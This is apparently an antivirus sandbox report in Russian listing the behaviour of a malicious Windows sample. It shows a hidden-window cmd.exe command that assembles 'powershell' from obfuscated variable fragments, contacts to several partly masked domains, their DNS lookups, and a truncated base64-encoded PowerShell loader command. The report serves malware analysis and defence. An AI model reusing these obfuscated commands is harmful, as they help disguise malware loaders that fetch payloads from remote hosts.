Техническая информация
- '<SYSTEM32>\cmd.exe' /v /c "set %DVUwrYfsG%=wers&&set %MrBphRDDZ%=YBrplvdkW&&set %bBEzhwirJ%=po&&set %jfKjUoqcw%=rYzwtFGRh&&set %SQkdMhdYo%=hell&&set %mNoDsnzGr%=OMJXPiPCc&&!%bBEzhwirJ%!!%DVUwrYfsG%!!%S...
- 'al##ilm.es':80
- 'we####quiatria.com':80
- 'we####quiatria.com':443
- 'dr#####stoph-larisch.de':80
- 'tr####nbacher.com':80
- 'tr####nbacher.com':443
- 'we##so.com':80
- 'we####quiatria.com':443
- 'tr####nbacher.com':443
- DNS ASK al##ilm.es
- DNS ASK we####quiatria.com
- DNS ASK dr#####stoph-larisch.de
- DNS ASK tr####nbacher.com
- DNS ASK we##so.com
- '<SYSTEM32>\cmd.exe' /v /c "set %DVUwrYfsG%=wers&&set %MrBphRDDZ%=YBrplvdkW&&set %bBEzhwirJ%=po&&set %jfKjUoqcw%=rYzwtFGRh&&set %SQkdMhdYo%=hell&&set %mNoDsnzGr%=OMJXPiPCc&&!%bBEzhwirJ%!!%DVUwrYfsG%!!%S...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JgAgACgAKABnAGUAVAAtAFYAYQBSAGkAQQBCAGwAZQAgACcAKgBNAGQAUgAqACcAKQAuAE4AQQBNAEUAWwAzACwAMQAxACwAMgBdAC0ASgBPAGkAbgAnACcAKQAoACAAWwBzAFQAcgBpAG4ARwBdADoAOgBqAG8ASQBuACgAIAAnACcAIAAsACgAJwAzAD...